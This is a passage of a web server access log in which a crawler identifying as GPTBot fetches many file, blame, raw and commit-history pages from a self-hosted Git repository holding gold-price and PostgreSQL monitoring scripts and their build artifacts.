+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11781] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" [Client 74.7.227.38] [Length 9952] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:13:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10196] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build" [Client 74.7.227.38] [Length 10380] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build" -[17/Feb/2026:13:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10429] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13659] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17420] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" [Client 74.7.227.38] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" -[17/Feb/2026:13:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17312] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17419] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13257] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9872] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11001] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17084] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17311] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10932] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16190] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13037] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11160] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10186] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48958] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9542] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10405] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:45:38 +0000] - 200 200 - GET https 